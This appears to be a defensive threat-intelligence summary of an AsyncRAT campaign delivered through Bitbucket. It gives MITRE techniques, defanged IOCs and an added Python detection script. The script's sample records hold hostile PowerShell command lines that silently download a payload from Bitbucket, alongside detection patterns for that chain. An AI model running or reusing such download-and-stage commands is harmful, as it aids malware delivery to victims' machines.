This article discusses an attack campaign that delivers the AsyncRAT malware through the legitimate code-hosting platform Bitbucket. The attackers abuse the trust placed in Bitbucket as a widely used code-hosting service to make their payload hosting look unremarkable, and wrap the payload in several layers of obfuscation to hinder analysis and evade detection. Key indicators of compromise have been identified to help defenders detect and block this threat. Affected: Bitbucket (abused as a payload host), victims of AsyncRAT malware
Keypoints :
- Attackers used Bitbucket to host AsyncRAT payloads, leveraging its legitimacy and accessibility.
- Multi-stage approach employed, featuring VBScript and PowerShell for delivery mechanisms.
- VBScript acts as an obfuscation layer to execute PowerShell commands.
- PowerShell downloads the actual malicious file (dllhope.txt) from Bitbucket.
- AsyncRAT is a powerful Remote Access Trojan facilitating extensive control over infected machines.
- Different layers of encoding and obfuscation were used to evade detection.
- Indicators of compromise (IOCs) were identified, including specific file names and URLs.
MITRE Techniques :
- Execution: Command and Scripting Interpreter: PowerShell (T1059.001) – PowerShell command execution to download the payload.
- Execution: Command and Scripting Interpreter: Windows Command Shell (T1059.003) – Utilized for command execution in the attack.
- Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) – Mechanism to maintain persistence.
- Defense Evasion: Obfuscated Files or Information (T1027) – Malware uses obfuscation to hide its true nature.
- Defense Evasion: Masquerading (T1036) – The malicious files use legitimate names to avoid suspicion.
- Defense Evasion: Deobfuscate/Decode Files or Information (T1140) – Techniques used to decode hidden elements of the attack.
- Defense Evasion: Process Injection (T1055) – Injecting into processes for stealthy execution.
- Defense Evasion: Virtualization/Sandbox Evasion (T1497) – Checks for virtualization tools to evade detection.
- Command and Control: Remote Access Software (T1219) – Provides attackers with control over victim systems.
- Collection: Input Capture: Keylogging (T1056.001) – Capturing keystrokes from infected machines.
- Exfiltration: Exfiltration Over C2 Channel (T1041) – Data sent back to the attackers via command-and-control.
- Credential Access: OS Credential Dumping (T1003) – Stealing credentials from the infected system.
- Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001) – Using Remote Desktop Protocol for lateral movement.
- Impact: Data Encrypted for Impact (T1486) – Encrypting files on the victim’s system.
Indicator of Compromise :
- SHA256 (Filename 1): 8fb6471b01c1d8122548d184ce5bceefae4df4ef0f1d1bb5c67b276c258e9125
- SHA256 (Filename 2): e0d40dbc6be121cf62f222295ab1e01b5ce741d37d6c4b53f3beacb38a66e8e8
- SHA256 (Filename 3): ab3d8588b58152994d299fa57842798f3071cb0f550b37f1db8b42d56f8580f2
- URL hXXps[:]//bitbucket.org/jaiprrfc/sds/downloads/envio4sep.txt
- URL hXXps[:]//bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt
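The following detection script is an added example, not code from the G DATA write-up or from the campaign itself. It turns the delivery chain from the key points (a VBScript host spawning PowerShell, which fetches a .txt payload from a Bitbucket repository's downloads area) and the IOCs listed above into matching logic run over a few constructed, Sysmon-style process-creation and file records. The event field names (ParentImage, Image, CommandLine, Hashes, RecordId), the sample command lines, the "stage2.txt" URL in the fourth record and the reason labels are all assumptions made for illustration; only the three hashes and two URLs come from the article.

```python
"""Added detection example (not from the G DATA write-up): match the
VBScript -> PowerShell -> Bitbucket delivery chain and the published IOCs
against constructed, Sysmon-style event records."""
import re
from typing import Dict, Iterable, List, Optional

# IOCs as listed in the article, kept in defanged form.
IOC_URLS = {
    "hXXps[:]//bitbucket.org/jaiprrfc/sds/downloads/envio4sep.txt",
    "hXXps[:]//bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt",
}
IOC_SHA256 = {
    "8fb6471b01c1d8122548d184ce5bceefae4df4ef0f1d1bb5c67b276c258e9125",
    "e0d40dbc6be121cf62f222295ab1e01b5ce741d37d6c4b53f3beacb38a66e8e8",
    "ab3d8588b58152994d299fa57842798f3071cb0f550b37f1db8b42d56f8580f2",
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # interpreters that run VBScript
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def refang(text: str) -> str:
    """Turn defanged notation (hXXps[:]//, [.]) back into what real logs contain."""
    text = re.sub(r"hxxp", "http", text, flags=re.I)
    return text.replace("[:]", ":").replace("[.]", ".")


def normalise(text: str) -> str:
    """Refang, then lower-case, so IOCs match plain or defanged log content."""
    return refang(text).lower()


IOC_URLS_NORM = {normalise(u) for u in IOC_URLS}

# Generic form of the hosting pattern: a .txt fetched from <user>/<repo>/downloads/
# on bitbucket.org. Assumption: this is deliberately loose; tune against your own
# baseline of legitimate Bitbucket use before alerting on it.
BITBUCKET_TXT_RE = re.compile(
    r"https?://bitbucket\.org/[^/\s'\"]+/[^/\s'\"]+/downloads/[^\s'\"]+\.txt", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def sha256_from_hashes_field(hashes: str) -> Optional[str]:
    """Sysmon writes 'SHA256=...,MD5=...'; return the SHA256 value if present."""
    for part in hashes.split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return None


def analyse(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = normalise(event.get("CommandLine", ""))

    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append("vbscript_host_spawned_powershell")
    if any(u in cmd for u in IOC_URLS_NORM):
        reasons.append("known_ioc_url")
    elif BITBUCKET_TXT_RE.search(cmd):
        reasons.append("bitbucket_downloads_txt_fetch")
    if sha256_from_hashes_field(event.get("Hashes", "")) in IOC_SHA256:
        reasons.append("known_ioc_sha256")
    return reasons


def scan(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map RecordId -> reasons for every event that triggered at least one rule."""
    return {e["RecordId"]: r for e in events if (r := analyse(e))}


# Constructed sample records (assumption: Sysmon-like fields; URLs kept defanged
# here, while real logs would hold the plain form that normalise() also accepts).
SAMPLE_EVENTS = [
    {"RecordId": "evt-1",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iwr hXXps[:]//bitbucket.org/"
                    "556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt -OutFile $env:TEMP\\d.txt\""},
    {"RecordId": "evt-2",                       # benign: admin runs PowerShell
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"RecordId": "evt-3",                       # file record carrying an IOC hash
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Public\dllhope.txt",
     "Hashes": "SHA256=E0D40DBC6BE121CF62F222295AB1E01B5CE741D37D6C4B53F3BEACB38A66E8E8"},
    {"RecordId": "evt-4",                       # same pattern, unknown (assumed) URL
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c \"iwr hXXps[:]//bitbucket.org/example-user/"
                    "example-repo/downloads/stage2.txt\""},
]

if __name__ == "__main__":
    for record_id, reasons in scan(SAMPLE_EVENTS).items():
        print(record_id, ", ".join(reasons))
```

The generic Bitbucket rule is kept separate from the exact-IOC rule on purpose: hashes and URLs rotate between campaigns, while the hosting pattern (a text-extension payload under a repository's downloads path, pulled by PowerShell spawned from a script host) is what survives a rebuild.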
Full Story: https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket